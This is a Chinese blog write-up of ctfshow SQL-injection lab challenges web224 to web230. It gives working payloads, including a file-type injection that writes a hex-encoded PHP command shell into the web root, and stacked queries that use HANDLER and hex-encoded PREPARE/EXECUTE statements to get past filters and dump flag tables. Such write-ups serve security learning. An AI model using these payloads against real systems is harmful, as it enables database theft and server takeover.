ctfshow-web入门-sql注入(web224-web230)文件类型注入、routines存储过程与函数状态、handler语句、预处理prepare+execute

于 2024-08-19 18:54:44 发布
阅读量365 收藏 8
点赞数 12
分类专栏: SQL ctfshow web 文章标签: sql 数据库 安全 web安全 mysql web 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/141323202
版权
web 同时被 3 个专栏收录
171 篇文章 20 订阅
订阅专栏
ctfshow
72 篇文章 1 订阅
订阅专栏
SQL
27 篇文章 1 订阅
订阅专栏

目录

1、web224

2、web225

3、web226

4、web227

5、web228

6、web229

7、web230

1、web224

登录页面测了下没发现注入点

存在 robots.txt

访问 /pwdreset.php  ,是管理员密码重置的页面

直接重置密码,这里以 123456 为例

使用 admin/123456 登录 

来到一个文件生成界面

对文件大小有限制

文件类型也有限制

看了 wp 是文件类型注入,后台会通过读取文件内容判断文件类型,记录到数据库,对文件进行重命名。新建一个 txt 文件,写入如下内容:

C64File "');select 0x3c3f3d60746163202f662a603f3e into outfile '/var/www/html/myon.php';--+

C64File 是与 Commodore 64 相关的文件类型,之后闭合,写入 sql 语句,其中

3c3f3d60746163202f662a603f3e 为我们想要执行的命令的十六进制形式。

访问写入的 myon.php

拿到 flag:ctfshow{ddec6f4e-f82b-4c75-92df-d0c646cf011a}

试了下其他类型的文件也可以传

但是写入有问题

2、web225

堆叠提升开始

过滤掉了很多东西 

查表名:

/api/index.php?username=0';show tables;#

存在一个名为 ctfshow_flagasa 的表

查这个表下的列名:

/api/index.php?username=0';show columns from ctfshow_flagasa;#

得到 flag 的字段名为 flagas

一般我们可以通过重命名表和更改字段名来实现查询 flag,这里原本是:

select id,username,pass from ctfshow_user where username = '{$username}';

我们可以改为:

select id,flag,pass from ctfshow_flagasa where flag = '{$username}';

也就是将表名 ctfshow_user 改为了 ctfshow_flagasa,将字段名 username 改为 flag,之后我们就可以使用万能密码 1' or 1=1# 查出 flag。

使用 RENAME TABLE 语句来重命名一个表:

RENAME TABLE old_table_name TO new_table_name;

使用 ALTER TABLE 配合 CHANGE 语句来重命名列名:

ALTER TABLE table_name CHANGE old_column_name new_column_name datatype;

但是由于这道题过滤了 alter,因此这种方法不行。

这个题非常像我之前在攻防世界刷过的一道题:

supersqli(SQL注入流程及常用SQL语句)-CSDN博客icon-default.png?t=N7T8https://myon6.blog.csdn.net/article/details/129805447

不过那道题没有过滤 alter,当然我们还有其他的方法,采用 handler 语句:

handler 是 mysql 的专用语句,没有包含到 SQL 标准中,但它每次只能查询 1 次记录,而 select 可以根据需要返回多条查询结果。 

hander `表名` open;           // 打开一个表

handler`表名`read frist;      // 查询第一个数据

handler`表名`read next;     // 查询之后的数据直到最后一个数据返回空

先打开表 ctfshow_flagasa,再查询它,payload:

0';handler`ctfshow_flagasa` open;handler`ctfshow_flagasa`read next;#

拿到 flag:ctfshow{28ec601d-4120-405d-b5da-3809145c24bb} 

或者这样用:

0';handler`ctfshow_flagasa` open as`a`;handler`a`read next;#

这里用 first 和 next 都是可以的,因为就一个数据。

还可以采用预处理的方法:prepare + execute

PREPARE 语句准备好一条 SQL 语句,并分配给这条 SQL 语句一个名字供之后调用,通过EXECUTE 命令执行,最后使用 DEALLOCATE PREPARE 命令释放。

payload:

0';prepare myon from concat("sel","ect * from `ctfshow_flagasa`");execute myon;#

3、web226

新增过滤 show 和括号,采用十六进制绕过。

查表名:

0';prepare myon from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute myon;#

拿到表名 ctfsh_ow_flagas,查列名:

0';prepare myon from 0x73656c6563742067726f75705f636f6e63617428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d6461746162617365282920616e64207461626c655f6e616d653d2763746673685f6f775f666c6167617327;execute myon;#

查字段:

0';prepare myon from 0x73656c65637420666c61676173622066726f6d2063746673685f6f775f666c61676173;execute myon;#

拿到 flag:ctfshow{808156a6-3460-4610-a716-2aa5f7f521fb}

4、web227

过滤内容对我们上一题的 payload 无影响,先查表名:

0';prepare myon from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute myon;#

发现只有一个名为 ctfshow_user 的表 

看了 wp 这道题需要查看存储过程和函数的状态,通过查询 information_schema.ROUTINES 表来查看存储过程和函数的详细信息,直接查这个表下的所有东西:

0';prepare myon from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;execute myon;#

看到 flag:ctfshow{f2b7398c-eccb-45b0-bf40-c3b2f4767760} 

当然,如果知道存储过程或函数的名称,可以查询其详细信息,包括定义:

第一步我们可以得到函数名为 getFlag

具体指定函数名再进行查询:

select * from information_schema.routines where routine_name='getFlag'

其中 routine_name 用于指定存储过程或函数的名称  

其中 routine_name 用于指定存储过程或函数的名称 

如果存储过程和存储函数名称相同,则需要再指定  routine_type  字段表明查询的是哪种类型的存储程序:

比如指定查询的类型是函数

select * from information_schema.routines where routine_name='getFlag' and routine_type='function'

查出来没有,看来这里的 getFlag 并不是函数类型 

那么我们指定进程类型看看呢:

select * from information_schema.routines where routine_name='getFlag' and routine_type='procedure'

还真是进程

5、web228

还是采用预处理,查表名:

0';prepare myon from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute myon;#

查列名:

select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfsh_ow_flagasaa'
0';prepare myon from 0x73656c6563742067726f75705f636f6e63617428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d6461746162617365282920616e64207461626c655f6e616d653d2763746673685f6f775f666c61676173616127;execute myon;#

查字段:

0';prepare myon from 0x73656c65637420666c6167617362612066726f6d2063746673685f6f775f666c616761736161;execute myon;#
select flagasba from ctfsh_ow_flagasaa

拿到 flag:ctfshow{0710b947-f29c-434f-94b5-59628ea645af}

6、web229

查表名:

0';prepare myon from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute myon;#

flag 

查列名:

flagasba

查字段:

0';prepare myon from 0x73656c65637420666c6167617362612066726f6d20666c6167;execute myon;#

拿到 flag:ctfshow{24939b59-7383-48b6-af76-11048fe77fe2}

7、web230

查表名:

0';prepare myon from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;execute myon;#

flagaabbx 

查列名:

0';prepare myon from 0x73656c6563742067726f75705f636f6e63617428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d6461746162617365282920616e64207461626c655f6e616d653d27666c6167616162627827;execute myon;#

flagasbas 

查字段:

0';prepare myon from 0x73656c65637420666c616761736261732066726f6d20666c61676161626278;execute myon;#

拿到 flag:ctfshow{5d7f5613-76bb-41bd-8bd3-d12b63ae7d4b}

Myon⁶
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow sql注入 上篇(web221-253)
Kradress的博客
04-20 4686
目录前言思路题解总结 前言 输入源码 思路 ################################ 题解 ################################ 总结 …
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4371
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
ctfshow web入门-sql注入
LYJ20010728的博客
09-21 2910
ctfshow web入门-sql注入web171web172web173web174web175web176web177web178web179web180web181web182web183web184web185web186web187web188web189web190web191web192web193web194web195web195web197web198web199web200web201web202web203 web171 根据题目给出的查询语句构造 Payload $sql
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 713
重新来做一遍 争取不看wp。
ctfshow web入门 sql注入(超详解)201-250
qq_50589021的博客
08-23 4647
web201 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';"; 返回逻辑 //对传入的参数进行了过滤 function waf($str){ //代码过于简单,不宜展示 } 需要学会: 使用--user-agent 指定agent --user-agent="Mozilla/5
ctfshow---sql注入(214-253)
fainpo的博客
05-15 3180
时间盲注了打开页面什么都没有,抓包也什么都没有,抓一下这个原始页面的包可以看到里面有参数将debug修改成1后可以看到有返回的内容既然说是时间盲注那么直接将ip修改成sleep(3) 成功延时三秒后显示内容。
CTFshow-web入门-sqli-web171-253
m0_72655585的博客
07-17 702
web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。把用户输入的数据当作代码来执行,违背了“数据与代码分离”的原则1.用户能控制输入的内容;2.web应用把用户输入的内容带入到数据库执行;1.盗取网站的敏感信息;2.绕过网站后台认证 后台登录语句: 3.借助SQL注入漏洞提权获取系统权限;4.读取文件信息。(1)user() 返回当前使用数据库的用户,也就是网站配置文件中连
ctfshow sql注入 web171-web253 wp
mumuzi的博客
02-02 5982
存货,别说我卷了
CTFSHOW-SQL注入-二
qq_51754713的博客
10-04 672
title: CTFSHOW-SQL注入(二) date: 2021-09-25 09:32:11 tags: CTF-WEB CTFSHOW-SQL注入(二) 这里是ctfshow sql注入的第二篇 题目:214-250 因为对SQLmap的使用和tamper的编写还是不太熟悉。因此跳过了sqlmap的部分。 时间盲注 web 214(时间盲注-数字型) 整懵了。上来注入点都找不到。 师傅们说在/api/index.php的post里面 id=xx&debug=0 也没说为什么。反正这个不是.
完整精品数据库课件 MySQL入门到精通 第10章 存储过程函数(共19页).ppt
10-12
MySQL是世界上最流行的关系型数据库管理系统之一,而存储过程函数是其强大功能的重要组成部分。本章节将深入探讨这两个概念,以及如何在MySQL中创建、调用、查看、修改和删除它们。 1. **创建存储过程函数** -...
routines-mini:Mac菜单栏应用程序
05-23
我在博客上写了一些有关该应用程序的内容该应用程序是使用以下程序构建的用-用于将其打包为菜单栏应用程序用于将数据存储在IndexedDB中用于构建UI可用脚本在项目目录中,可以运行:yarn electron:dev 在开发模式下...
extend-saga-routines:可以与 redux-saga-routines 一起使用的扩展例程,甚至没有 redux-saga 本身,基本上是另一个动作创建者库
08-03
随意将此库与任何其他堆栈一起使用! 什么是扩展程序? 使用此包,您可以创建。 它的 API 允许您,创建具有,创建。 您还可以创建一个其中包含特定于套接字的阶段和。 关于redux-saga-routines更多信息 如果你想...
Mysql-事务与存储过程.pdf
06-17
### MySQL中的事务与存储过程 #### 事务管理 ##### 6.1.1 事务的概念 事务是数据库中一组逻辑上具有完整性的操作序列。它包含了一组SQL语句,这些语句要么全部成功执行,要么全部不执行。事务的核心特性包括: -...
kong-oauth2-demo:这是一个与Kong OAuth2插件一起使用的简单演示
03-07
kong-oauth2-demo 这是一个与Kong oauth2插件一起使用的简单演示,显示了4种不同的授权流程我还在fomm/kong-oauth2-demo制作了一个fomm/kong-oauth2-demo镜像您可以使用docker run -d -p 8080:80 fomm/kong-oauth2-...
SQL FOREIGN KEY 约束
m0_50736744的博客
08-16 406
SQL FOREIGN KEY 约束一个表中的 FOREIGN KEY 指向另一个表中的 UNIQUE KEY(唯一约束的键)。
Prostgresql的Timescaledb插件/扩展部署
weixin_45697805的博客
08-14 246
背景:研发需求,需要把docker部署得postgresql迁移到新的节点并要求再本地部署,提前查看数据库需要那些插件,并进行安装,docker部署的默认有插件。
4.1 SQL的起源与发展
在路上的专栏
08-16 871
SQL(结构化查询语言)是数据库管理的基石,自20世纪70年代诞生以来,它不断发展和演化,成为全球最广泛使用的数据查询语言。本文将通过生动的故事和易于理解的语言,带你了解SQL的起源、发展历程及其对现代数据库管理的深远影响。文章内容既适合数据库新手,也对专业人士具有参考价值。
SQL - 基础大汇总
最新发布
心如冰清,天塌不惊
08-16 406
【代码】数据库 - 基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值